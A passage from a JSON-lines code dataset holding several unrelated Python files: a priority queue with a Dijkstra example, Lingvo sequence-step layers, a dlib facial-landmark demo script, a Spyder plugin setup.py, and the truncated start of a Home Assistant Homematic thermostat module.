'c':\\n\", pq)\n print(\"Contains 'c'?\", pq.contains('c'))\n print(\"Get elements until empty:\")\n while pq:\n print(pq.get(), \"contains 'd'?\", pq.contains('d'))\n\n '''\n # Max-heap priority queue with random float weights and integer names\n pq = PriQ(True)\n for i in range(20):\n pq.put(i, random.random())\n print(\"['1'-'20' = random()]:\\n\", pq)\n while pq: print(pq.get())\n '''\n\n # Dijkstra's shortest path algorithm example\n def dsp(G, s):\n '''Dijkstra's shortest path algorithm. Input: weighted graph G, an\\\n adjacency list mapping each named node to it's neighbors with a {name: weight}\\\n dict, and s, the name of the starting node. Outputs a mapping for each node\\\n to a tuple of (weight of shortest path, name of predecessor node).\n '''\n pq = PriQ()\n result = {}\n predecessor = {s: None}\n for key in G.keys():\n pq.put(key, 0 if key == s else float('inf'))\n while pq:\n cur_weight, cur_node = pq.get()\n result[cur_node] = (cur_weight, predecessor[cur_node])\n for adj in G[cur_node]: # for neighboring nodes\n # update weight from starting node if less than previous paths\n if adj not in result:\n if pq.get_priority(adj) > cur_weight + G[cur_node][adj]:\n pq.update(adj, cur_weight + G[cur_node][adj])\n predecessor[adj] = cur_node\n return result\n\n G = {\n 'a': {'b': 2, 'f': 6, 'c': 1},\n 'b': {'a': 2, 'd': 6, 'f': 3, 'g': 4},\n 'c': {'a': 1, 'f': 2, 'g': 3, 'e': 5},\n 'd': {'b': 6, 'f': 2, 'g': 1, 'h': 2},\n 'e': {'c': 5, 'f': 4, 'g': 2, 'h': 3},\n 'f': {'a': 6, 'b': 3, 'd': 2, 'g': 7, 'e': 4, 'c': 2},\n 'g': {'f': 7, 'b': 4, 'd': 1, 'h': 5, 'e': 2, 'c': 3},\n 'h': {'d': 2, 'g': 5, 'e': 3}\n }\n print(\n '''\n B 6 D\n 2 3 2 4 1 2\n A 6 F 7 G 5 H\n 1 2 3 4 2 3\n C 5 E\n ''')\n print(\"\\nCalculating shortest paths with Dijkstra's algorithm...\")\n print(\"Shortest paths from 'a':\", dsp(G, 'a'))\n print(\"Shortest paths from 'd':\", dsp(G, 'd'))"} {"ext": "py", "sha": "1a2f631f3f1e62117c3b1a341897500e1a37b9f4", "content": "# Lint as: python3\n# Copyright 2019 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"An abstract layer for processing sequences step-by-step.\n\nE.g.::\n\n def ProcessSeq(step, external_inputs, input_batch):\n prepared_inputs = step.PrepareExternalInputs(\n step.theta, external_inputs)\n batch_size, T = tf.shape(input_batch.paddings)[:2]\n state = step.ZeroState(\n step.theta, prepared_inputs, batch_size)\n for t in range(T):\n step_inputs = input_batch.Transform(lambda x: x[:, i, ...])\n step_outputs, state = step.FProp(\n step.theta, prepared_inputs, step_inputs, state)\n (processing step_outputs...)\n\"\"\"\n\nimport collections\n\nfrom lingvo import compat as tf\nfrom lingvo.core import base_layer\nfrom lingvo.core import builder_layers\nfrom lingvo.core import py_utils\nfrom lingvo.core import recurrent\n\n\nclass Step(base_layer.BaseLayer):\n \"\"\"A layer that processes input sequences step-by-step.\n\n This can be seen as an RNNCell extended with optional external inputs.\n \"\"\"\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"Returns the prepared external inputs, e.g., packed_src for attention.\"\"\"\n if not external_inputs:\n external_inputs = py_utils.NestedMap()\n packed = external_inputs.DeepCopy()\n for name, child in self.children.items():\n child_external_inputs = external_inputs.get(name, py_utils.NestedMap())\n if isinstance(child, (tuple, list)):\n output = []\n for i, sub in enumerate(child):\n if isinstance(sub, Step):\n output.append(\n sub.PrepareExternalInputs(theta[name][i],\n child_external_inputs))\n if output:\n if len(output) != len(child):\n raise ValueError('Expecting child list to be instances of Step.')\n packed[name] = type(child)(output)\n elif isinstance(child, Step):\n packed[name] = child.PrepareExternalInputs(theta[name],\n child_external_inputs)\n return packed\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"Returns the initial state given external inputs and batch size.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: External inputs returned by PrepareExternalInputs().\n batch_size: An int scalar representing the batch size of per-step inputs.\n\n Returns:\n A `.NestedMap` representing the initial state, which can be passed to\n FProp() for processing the first time step.\n \"\"\"\n state0 = py_utils.NestedMap()\n for name, child in self.children.items():\n if isinstance(child, (tuple, list)):\n output = []\n for i, sub in enumerate(child):\n if isinstance(sub, Step):\n output.append(\n sub.ZeroState(theta[name][i], prepared_inputs[name][i],\n batch_size))\n if output:\n if len(output) != len(child):\n raise ValueError('Expecting child list to be instances of Step.')\n state0[name] = type(child)(output)\n elif isinstance(child, Step):\n state0[name] = child.ZeroState(theta[name], prepared_inputs[name],\n batch_size)\n return state0\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Forward function.\n\n step_inputs, state0, step_outputs, and state1 should each be a `.NestedMap`\n of tensor values. Each tensor must be of shape [batch_size ...]. The\n structure of NestedMaps are determined by the implementation. state0 and\n state1 must have exactly the same structure and tensor shapes.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: External inputs returned by PrepareExternalInputs().\n step_inputs: The inputs for this time step.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: The previous recurrent state.\n\n Returns:\n A tuple (step_outputs, state1).\n\n - outputs: The outputs of this step.\n - state1: The next recurrent state.\n \"\"\"\n raise NotImplementedError(type(self))\n\n\nclass StatelessLayerStep(Step):\n \"\"\"Allows BaseLayer subclasses to be used as Steps.\n\n Layers used with this class should be stateless: they should not return\n anything that must be passed back in the next invocation.\n \"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('layer', None, 'Params for the layer that this step wraps.')\n return p\n\n def __init__(self, params):\n super().__init__(params)\n p = params\n self.CreateChild('layer', p.layer)\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Perform inference on a stateless layer.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: unused.\n step_inputs: A NestedMap containing 'inputs', which are passed directly to\n the layer.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: unused.\n\n Returns:\n (output, state1), where output is the output of the layer, and\n state1 is an empty NestedMap.\n \"\"\"\n del state0\n del prepared_inputs\n args = {}\n if padding is not None:\n args['padding'] = padding\n output = self.layer.FProp(theta.layer, step_inputs.inputs, **args)\n return output, py_utils.NestedMap()\n\n\nclass StackStep(Step):\n \"\"\"A stack of steps.\n\n Each sub-step is assumed to accept step_inputs of type NestedMap(inputs=[])\n and return a primary output of type NestedMap(output=tensor). The\n output of layer n-1 is sent to input of layer n.\n\n Per-step context vectors and per-sequence context vectors can also be\n supplied; see FProp for more details.\n \"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define(\n 'sub', [], 'A list of sub-stack params. Each layer is '\n 'expected to accept its input as NestedMap(inputs=[]), and '\n 'produce output as NestedMap(output=tensor). '\n 'The external_inputs parameter is passed directly to the '\n 'PrepareExternalInputs method of each sub-step. ')\n p.Define(\n 'residual_start', -1, 'An index of the layer where residual '\n 'connections start. Setting this parameter to a negative value turns '\n 'off residual connections.'\n 'More precisely, when i >= residual_start, the output of each step '\n 'is defined as: '\n 'output[i] = output[i - residual_stride] + sub[i](output[i - 1]) '\n 'where output[-1] is the step input.')\n p.Define(\n 'residual_stride', 1, 'If residual connections are active, this '\n 'is the number of layers that each connection skips. For '\n 'instance, setting residual_stride = 2 means the output of layer '\n 'n is added to layer n + 2')\n return p\n\n def __init__(self, params):\n super().__init__(params)\n p = params\n self.sub_steps = []\n self.CreateChildren('sub', p.sub)\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"Delegates external inputs preparation to sub-layers.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n external_inputs: A `.NestedMap` object. The structure of the internal\n fields is defined by the sub-steps.\n\n Returns:\n A `.NestedMap` containing a pre-processed version of the external_inputs,\n one per sub-step.\n \"\"\"\n packed = py_utils.NestedMap(sub=[])\n for i in range(len(self.sub)):\n packed.sub.append(self.sub[i].PrepareExternalInputs(\n theta.sub[i], external_inputs))\n return packed\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"Computes a zero state for each sub-step.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: An output from PrepareExternalInputs.\n batch_size: The number of items in the batch that FProp will process.\n\n Returns:\n A `.NestedMap` containing a state0 object for each sub-step.\n \"\"\"\n state = py_utils.NestedMap(sub=[])\n for i in range(len(self.sub)):\n state.sub.append(self.sub[i].ZeroState(theta.sub[i], prepared_inputs,\n batch_size))\n return state\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Performs inference on the stack of sub-steps.\n\n There are three possible ways to feed input to the stack:\n\n * step_inputs.inputs: These tensors are fed only to the lowest layer.\n * step_inputs.context: [Optional] This tensor is fed to every layer.\n * prepared_inputs: [Optional] This tensor is fed to every layer and\n is assumed to stay constant over all steps.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: An output from PrepareExternalInputs.\n step_inputs: A `.NestedMap` containing a list called 'inputs', an\n optionally a tensor called 'context'.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: The previous recurrent state.\n\n Returns:\n A tuple (output, state1):\n\n - output: A `.NestedMap` containing the output of the top-most step.\n - state1: The recurrent state to feed to next invocation of this graph.\n \"\"\"\n state1 = py_utils.NestedMap(sub=[])\n inputs = list(step_inputs.inputs)\n # We pretend that the input is the output of layer -1 for the purposes\n # of residual connections.\n residual_inputs = [tf.concat(inputs, axis=1)]\n additional = []\n if 'context' in step_inputs:\n additional.append(step_inputs.context)\n for i in range(len(self.sub)):\n sub_inputs = py_utils.NestedMap(inputs=inputs + additional)\n sub_output, state1_i = self.sub[i].FProp(theta.sub[i],\n prepared_inputs.sub[i],\n sub_inputs, padding,\n state0.sub[i])\n state1.sub.append(state1_i)\n output = sub_output.output\n if i >= self.params.residual_start >= 0:\n # residual_inputs contains the step input at residual_inputs[0].\n assert i + 1 - self.params.residual_stride < len(residual_inputs)\n output += residual_inputs[i + 1 - self.params.residual_stride]\n residual_inputs.append(output)\n inputs = [output]\n return py_utils.NestedMap(output=output), state1\n\n\nclass ParallelStep(Step):\n \"\"\"Runs many steps on the same input and concatenates their outputs.\"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define(\n 'sub', [], 'A list of step params. Each step is '\n 'expected to accept its input as NestedMap(inputs=[]), and '\n 'produce output as NestedMap(output=tensor). '\n 'The external_inputs parameter is passed directly to the '\n 'PrepareExternalInputs method of each sub-step. ')\n return p\n\n def __init__(self, params):\n super().__init__(params)\n p = params\n self.CreateChildren('sub', p.sub)\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Performs inference on N steps at once and concatenates the result.\n\n Args:\n theta: A `.NestedMap` object containing weights' values of this layer and\n its children layers.\n prepared_inputs: An output from PrepareExternalInputs.\n step_inputs: A `.NestedMap` containing a list called 'inputs'.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: The previous recurrent state.\n\n Returns:\n A tuple (output, state1):\n\n - output: A `.NestedMap` containing the output of the top-most step.\n - state1: The recurrent state to feed to next invocation of this graph.\n \"\"\"\n state1 = py_utils.NestedMap(sub=[None] * len(self.sub))\n outputs = [None] * len(self.sub)\n\n for i in range(len(self.sub)):\n outputs[i], state1.sub[i] = self.sub[i].FProp(theta.sub[i],\n prepared_inputs.sub[i],\n step_inputs, padding,\n state0.sub[i])\n\n output = py_utils.NestedMap(output=tf.concat(outputs, axis=1))\n return output, state1\n\n\n# signature: A GraphSignature string defining the input and output parameters\n# of this step. For example, (inputs=[a,b])->c means that step_inputs\n# should be NestedMap(inputs=[a,b]), and the output of FProp should be\n# stored in c.\n# external_signature: A GraphSignature string defining the input to\n# PrepareExternalInputs. For example, 'external_inputs.foo' means that\n# the tensor external_inputs.foo should be the 'external_inputs' parameter\n# when calling PrepareExternalInputs on this sub-step.\n# params: The parameters to use when constructing the sub-step.\nSubStep = collections.namedtuple('SubStep',\n ['signature', 'external_signature', 'params'])\n\n\nclass GraphStep(Step):\n r\"\"\"A step that connects sub-steps in a simple data flow graph.\n\n This is an adaptation of builder_layers.GraphLayer to support steps.\n\n Params.sub specifies a list of Specs that define each sub-step.\n\n A spec contains:\n\n * step_inputs: The signature describing how to assemble the input and output\n for this step. The input part describes the 'step_inputs' parameter,\n while the output part describes the name of the output. The state0\n input and state1 output are handled automatically and should not be\n specified.\n * external_inputs: if this Step requires external_inputs, this\n is the signature describing how to find those inputs.\n This value can also be set to None.\n * params: the params used to construct the sub-step.\n\n The format of signature strings is defined in detail in the GraphSignature\n class documentation.\n\n All inputs to a layer must have been produced by some previous layer. No\n cycles are allowed. All outputs must be uniquely named; no overwriting\n of previous names is allowed.\n\n Example\n ('(act=[layer_0.output,step_inputs.context])->layer_1',\n 'external_inputs.extra',\n step_params)\n\n This constructs the step defined by step_params. Its FProp method will be\n called with {act=[layer_0.output,step_inputs.context]} as the step_inputs\n parameter. Its PrepareExternalInputs method will be called with\n 'external_inputs.extra' as the external_inputs parameter. The output of that\n method will be passed to ZeroState and FProp.\n \"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('output_signature', '', 'Signature of the step output.')\n p.Define('sub', [], 'A list of SubSteps (defined above).')\n p.Define('dict_type', py_utils.NestedMap, 'Type of nested dicts.')\n return p\n\n _seq = collections.namedtuple(\n '_Seq', ['name', 'signature', 'external_signature', 'step'])\n\n def __init__(self, params):\n super().__init__(params)\n p = self.params\n assert p.name\n self._seq = []\n for i, (signature, external_signature, sub_params) in enumerate(p.sub):\n assert signature\n sig = builder_layers.GraphSignature(signature)\n assert len(sig.inputs) == 1\n assert sig.outputs\n external_sig = None\n if external_signature:\n external_sig = builder_layers.GraphSignature(external_signature)\n assert len(external_sig.inputs) == 1\n assert not external_sig.outputs\n name = sub_params.name\n if not name:\n name = '%s_%02d' % (sig.outputs[0], i)\n sub_params.name = name\n self.CreateChild(name, sub_params)\n self._seq.append(\n GraphStep._seq(name, sig, external_sig, self.children[name]))\n self.output_signature = builder_layers.GraphSignature(p.output_signature)\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"Prepares external inputs for each sub-step.\n\n The external_inputs parameter of this method is processed by the\n external_inputs of each sub-step, then processed by the sub-step's\n PrepareExternalInputs method.\n\n Args:\n theta: variables used by sub-steps.\n external_inputs: A NestedMap of [n_batch, ...] tensors.\n\n Returns:\n A NestedMap of prepared inputs, where the keys are the names of\n each sub-step.\n \"\"\"\n graph_tensors = builder_layers.GraphTensors()\n graph_tensors.StoreTensor('external_inputs', external_inputs)\n prepared_inputs = py_utils.NestedMap()\n with tf.name_scope(self.params.name):\n for seq in self._seq:\n if seq.external_signature:\n template = py_utils.NestedMap(inputs=seq.external_signature.inputs)\n packed = template.Transform(graph_tensors.GetTensor)\n seq_external_inputs = packed.inputs[0]\n prepared_inputs[seq.name] = seq.step.PrepareExternalInputs(\n theta[seq.name], seq_external_inputs)\n else:\n prepared_inputs[seq.name] = py_utils.NestedMap()\n return prepared_inputs\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"Creates a zero state NestedMap for this step.\n\n Args:\n theta: variables used by sub-steps.\n prepared_inputs: Output from a call to PrepareExternalInputs.\n batch_size: The number of items in the batch that FProp will process.\n\n Returns:\n A NestedMap of ZeroState results for each sub-step.\n \"\"\"\n state0 = py_utils.NestedMap()\n with tf.name_scope(self.params.name):\n for seq in self._seq:\n state0[seq.name] = seq.step.ZeroState(theta[seq.name],\n prepared_inputs[seq.name],\n batch_size)\n return state0\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"A single inference step for this step graph.\n\n Args:\n theta: variables used by sub-steps.\n prepared_inputs: A NestedMap containing external_inputs that were\n pre-processed by the PrepareExternalInputs method of each sub-step. The\n keys are the names of the sub-steps.\n step_inputs: A NestedMap of [batch, ...] tensors. The structure of this\n depends on the graph implementation.\n padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this\n batch element is empty in this step.\n state0: A NestedMap of state variables produced by either ZeroState or a\n previous invocation of this FProp step. The keys are the names of the\n sub-steps.\n\n Returns:\n (output, state1), both of which are NestedMaps.\n output is implementation-dependent and is defined by the output_signature\n parameter.\n state1 is a NestedMap where the keys are names of sub-steps and the values\n are state outputs from their FProp methods.\n \"\"\"\n p = self.params\n graph_tensors = builder_layers.GraphTensors()\n graph_tensors.StoreTensor('prepared_inputs', prepared_inputs)\n graph_tensors.StoreTensor('step_inputs', step_inputs)\n state1 = py_utils.NestedMap()\n with tf.name_scope(p.name):\n for seq in self._seq:\n tf.logging.vlog(1, 'GraphStep: call %s', seq.name)\n external = None\n if seq.external_signature:\n external = prepared_inputs[seq.name]\n template = py_utils.NestedMap(inputs=seq.signature.inputs)\n packed = template.Transform(graph_tensors.GetTensor)\n input_args = packed.inputs[0]\n out, seq_state1 = seq.step.FProp(theta[seq.name], external, input_args,\n padding, state0[seq.name])\n graph_tensors.StoreTensor(seq.signature.outputs[0], out)\n state1[seq.name] = seq_state1\n template = py_utils.NestedMap(inputs=self.output_signature.inputs)\n output_tensors = template.Transform(graph_tensors.GetTensor).inputs[0]\n return output_tensors, state1\n\n\nclass IteratorStep(Step):\n \"\"\"An iterator over the time dimension of some tensors.\n\n It's common to have a tensor of shape [batch, time, ...] or\n [time, batch, ...]. This object will step through the time dimension,\n producing tensors of shape [batch, ...] in succession.\n\n The input tensors are passed to PrepareExternalInputs. The step_inputs\n argument of FProp is unused.\n \"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('axis', 1, 'The time dimension of the tensors.')\n return p\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"Prepares the input for iteration.\n\n Args:\n theta: unused.\n external_inputs: A NestedMap containing tensors. The time axis of each\n tensor should be params.axis.\n\n Returns:\n A prepared NestedMap (current the same as the input).\n \"\"\"\n return external_inputs\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"Returns the initial iterator state.\n\n Args:\n theta: unused.\n prepared_inputs: Output from a call to PrepareExternalInputs.\n batch_size: The number of items in the batch that FProp will process.\n\n Returns:\n An initial state NestedMap.\n \"\"\"\n return py_utils.NestedMap(t=tf.constant(0, dtype=tf.int32))\n\n def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):\n \"\"\"Returns a A single inference step for this step graph.\n\n Args:\n theta: unused.\n prepared_inputs: Output from a call to PrepareExternalInputs.\n step_inputs: unused.\n padding: unused.\n state0: A NestedMap of state variables produced by either ZeroState or a\n previous invocation of this FProp step.\n\n Returns:\n (output, state1), both of which are NestedMaps.\n output is implementation-dependent and is defined by the output_signature\n parameter.\n state1 is a NestedMap where the keys are names of sub-steps and the values\n are state outputs from their FProp methods.\n \"\"\"\n del theta\n del step_inputs\n del padding\n\n def _Slice(tensor):\n \"\"\"Return a slice of this tensor at time=state0.t.\"\"\"\n shape = py_utils.GetShape(tensor)\n # All zeros except for t in the time dimension.\n # e.g. if params.axis=1, begin is [0, t, 0, 0, 0, ...]\n begin = tf.one_hot(self.params.axis, tf.rank(tensor), on_value=state0.t)\n # Same as shape, but with a 1 in the time dimension.\n # e.g. if params.axis=1, shape is [shape[0], 1, shape[2], shape[3], ...]\n size = tf.concat([\n shape[0:self.params.axis],\n tf.constant([1], dtype=tf.int32), shape[self.params.axis + 1:]\n ],\n axis=0)\n # Make a slice where the time dimension is fixed at state0.t.\n time_slice = tf.slice(tensor, begin, size)\n # Remove the time dimension.\n return tf.squeeze(time_slice, axis=self.params.axis)\n\n output = prepared_inputs.Transform(_Slice)\n state1 = py_utils.NestedMap(t=state0.t + 1)\n return output, state1\n\n\nclass RecurrentStepWrapper(base_layer.BaseLayer):\n \"\"\"A layer that wraps a step in a recurrent.Recurrent call.\"\"\"\n\n @classmethod\n def Params(cls):\n p = super().Params()\n p.Define('step', None, 'The step params that this class wraps.')\n return p\n\n def __init__(self, params):\n super().__init__(params)\n self.CreateChild('step', self.params.step)\n\n def _CreateChildrenVariables(self):\n # Backwards compatibility: manually call child.InstantiateVariables()\n # outside of tf.variable_scope(p.name).\n self.step.InstantiateVariables()\n super()._CreateChildrenVariables()\n\n def PrepareExternalInputs(self, theta, external_inputs):\n \"\"\"See Step.PrepareExternalInputs.\"\"\"\n return self.step.PrepareExternalInputs(theta.step, external_inputs)\n\n def ZeroState(self, theta, prepared_inputs, batch_size):\n \"\"\"See Step.ZeroState.\"\"\"\n return self.step.ZeroState(theta.step, prepared_inputs, batch_size)\n\n def FProp(self, theta, prepared_inputs, inputs, padding, state0, **kwargs):\n \"\"\"Runs a Step layer over multiple timesteps using Recurrent.\n\n Args:\n theta: A NestedMap containing weights' values of this layer and its\n children layers.\n prepared_inputs: External inputs returned by Step.PrepareExternalInputs().\n inputs: A NestedMap of inputs of shape [time, batch_size, dim].\n padding: A 0/1 float tensor of shape [time, batch_size]; 1.0 means that\n this batch element is empty in this step.\n state0: A NestedMap containing the initial recurrent state.\n **kwargs: Additional kwargs to pass to Recurrent.\n\n Returns:\n A tuple (outputs, state1).\n\n - outputs: A NestedMap containing the accumulated outputs of all steps,\n containing Tensors shaped [time, batch_size, dim].\n - state1: A NestedMap containing the accumulated recurrent states,\n containing Tensors shaped [time, batch_size, dim].\n \"\"\"\n\n def RnnStep(recurrent_theta, recurrent_state0, recurrent_inputs):\n \"\"\"Compute a single timestep.\"\"\"\n output, state1 = self.step.FProp(\n theta=recurrent_theta.theta,\n prepared_inputs=recurrent_theta.prepared_inputs,\n step_inputs=recurrent_inputs.inputs,\n padding=recurrent_inputs.padding,\n state0=recurrent_state0.state)\n recurrent_state1 = py_utils.NestedMap(output=output, state=state1)\n return recurrent_state1, py_utils.NestedMap()\n\n # In order to pass Step outputs through Recurrent, they need to be\n # included as part of state.\n output0, _ = self.step.FProp(theta.step, prepared_inputs,\n inputs.Transform(lambda x: x[0]), padding[0],\n state0)\n\n accumulated_states, _ = recurrent.Recurrent(\n theta=py_utils.NestedMap(\n theta=theta.step, prepared_inputs=prepared_inputs),\n state0=py_utils.NestedMap(output=output0, state=state0),\n inputs=py_utils.NestedMap(inputs=inputs, padding=padding),\n cell_fn=RnnStep,\n **kwargs)\n\n return accumulated_states.output, accumulated_states.state\n"} {"ext": "py", "sha": "1a2f639f66ea104a409626485e774ec7720d7bf6", "content": "# USAGE\n# python facial_landmarks.py --shape-predictor shape_predictor_68_face_landmarks.dat --image images/example_01.jpg\n\n# import the necessary packages\nfrom imutils import face_utils\nimport numpy as np\nimport argparse\nimport imutils\nimport dlib\nimport cv2\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n\thelp=\"path to facial landmark predictor\")\nap.add_argument(\"-i\", \"--image\", required=True,\n\thelp=\"path to input image\")\nargs = vars(ap.parse_args())\n\n# initialize dlib's face detector (HOG-based) and then create\n# the facial landmark predictor\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(args[\"shape_predictor\"])\n\n# load the input image, resize it, and convert it to grayscale\nimage = cv2.imread(args[\"image\"])\nimage = imutils.resize(image, width=500)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# detect faces in the grayscale image\nrects = detector(gray, 1)\n\n# loop over the face detections\nfor (i, rect) in enumerate(rects):\n\t# determine the facial landmarks for the face region, then\n\t# convert the facial landmark (x, y)-coordinates to a NumPy\n\t# array\n\tshape = predictor(gray, rect)\n\tshape = face_utils.shape_to_np(shape)\n\n\t# convert dlib's rectangle to a OpenCV-style bounding box\n\t# [i.e., (x, y, w, h)], then draw the face bounding box\n\t(x, y, w, h) = face_utils.rect_to_bb(rect)\n\tcv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n\t# show the face number\n\tcv2.putText(image, \"Face #{}\".format(i + 1), (x - 10, y - 10),\n\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n\t# loop over the (x, y)-coordinates for the facial landmarks\n\t# and draw them on the image\n\tfor (x, y) in shape:\n\t\tcv2.circle(image, (x, y), 1, (0, 0, 255), -1)\n\n# show the output image with the face detections + facial landmarks\ncv2.imshow(\"Output\", image)\ncv2.waitKey(0)"} {"ext": "py", "sha": "1a2f641584a08008ee532ab93c06ced2336e4710", "content": "# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------------\n# Copyright © 2021, Spyder Bot\n#\n# Licensed under the terms of the MIT license\n# ----------------------------------------------------------------------------\n\"\"\"\nStatus bar widgets setup.\n\"\"\"\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nfrom status_bar_widgets import __version__\n\n\nsetup(\n # See: https://setuptools.readthedocs.io/en/latest/setuptools.html\n name=\"status-bar-widgets\",\n version=__version__,\n author=\"Spyder Bot\",\n author_email=\"spyder.python@gmail.com\",\n description=\"Example that shows how to add wigets to the status bar\",\n license=\"MIT license\",\n url=\"https://github.com/spyder-bot/status-bar-widgets\",\n python_requires='>= 3.7',\n install_requires=[\n \"qtpy\",\n \"qtawesome\",\n \"spyder>=5.1.1\",\n ],\n packages=find_packages(),\n entry_points={\n \"spyder.plugins\": [\n \"status_bar_widgets = status_bar_widgets.spyder.plugin:StatusbarWidgets\"\n ],\n },\n classifiers=[\n \"Operating System :: MacOS\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Education\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Developers\",\n \"Topic :: Scientific/Engineering\",\n ],\n)\n"} {"ext": "py", "sha": "1a2f642f91ccc54a3e54b279bb474d03a514954f", "content": "\"\"\"Support for Homematic thermostats.\"\"\"\nimport logging\n\nfrom homeassistant.components.climate import ClimateDevice\nfrom homeassistant.components.climate.const import (\n HVAC_MODE_AUTO,\n HVAC_MODE_HEAT,\n HVAC_MODE_OFF,\n PRESET_BOOST,\n PRESET_COMFORT,\n PRESET_ECO,\n SUPPORT_PRESET_MODE,\n SUPPORT_TARGET_TEMPERATURE,\n)\nfrom homeassistant.const import ATTR_TEMPERATURE, TEMP_CELSIUS\n\nfrom . import ATTR_DISCOVER_DEVICES, HM_ATTRIBUTE_SUPPORT, HMDevice\n\n_LOGGER = logging.getLogger(__name__)\n\nHM_TEMP_MAP = [\"ACTUAL_TEMPERATURE\", \"TEMPERATURE\"]\n\nHM_HUMI_MAP = [\"ACTUAL_HUMIDITY\", \"HUMIDITY\"]\n\nHM_PRESET_MAP = {\n \"BOOST_MODE\": PRESET_BOOST,\n \"COMFORT_MODE\": PRESET_COMFORT,\n \"LOWERING_MODE\": PRESET_ECO,\n}\n\nHM_CONTROL_MODE = \"CONTROL_MODE\"\nHMIP_CONTROL_MODE = \"SET_POINT_MODE\"\n\nSUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE\n\n\ndef setup_platform(hass, config, add_entities, discovery_info=None):\n \"\"\"Set up the Homematic thermostat platform.\"\"\"\n if discovery_info is None:\n return\n\n devices = []\n for conf in discovery_info[ATTR_DISCOVER_DEVICES]:\n new_device = HMThermostat(conf)\n devices.append(new_device)\n\n add_entities(devices)\n\n\nclass HMThermostat(HMDevice, ClimateDevice):\n \"\"\"Representation of a Homematic thermostat.\"\"\"\n\n @property\n def supported_features(self):\n \"\"\"Return the list of supported features.\"\"\"\n return SUPPORT_FLAGS\n\n @property\n def temperature_unit(self):\n \"\"\"Return the unit of measurement that is used.\"\"\"\n return TEMP_CELSIUS\n\n @property\n def hvac_mode(self):\n \"\"\"Return hvac operation ie. heat, cool mode.\n\n Need to be one of HVAC_MODE_*.\n \"\"\"\n if self.target_temperature <= self._hmdevice.OFF_VALUE + 0.5:\n return HVAC_MODE_OFF\n if \"MANU_MODE\" in self._hmdevice.ACTIONNODE:\n if self._hm_control_mode == self._hmdevice.MANU_MODE:\n return HVAC_MODE_HEAT\n return HVAC_MODE_AUTO\n\n # Simple devices\n if self._data.get(\"BOOST_MODE\"):\n return HVAC_MODE_AUTO\n return HVAC_MODE_HEAT\n\n @property\n def hvac_modes(self):\n \"\"\"Return the list of available hvac operation modes.\n\n Need to be a subset of HVAC_MODES.\n \"\"\"\n if \"AUTO_MODE\" in self._hmdevice.ACTIONNODE:\n return [HVAC_MODE_AUTO, HVAC_MODE_HEAT, HVAC_MODE_OFF]\n return [HVAC_MODE_HEAT, HVAC_MODE_OFF]\n\n @property\n def preset_mode(self):\n \"\"\"Return the current preset mode, e.g., home, away, temp.\"\"\"\n if self._data.get(\"BOOST_MODE\", False):\n return \"boost\"\n\n # Get the name of the mode\n mode = HM_ATTRIBUTE_SUPPORT[HM_CONTROL_MODE][1][self._hm_control_mode]\n mode = 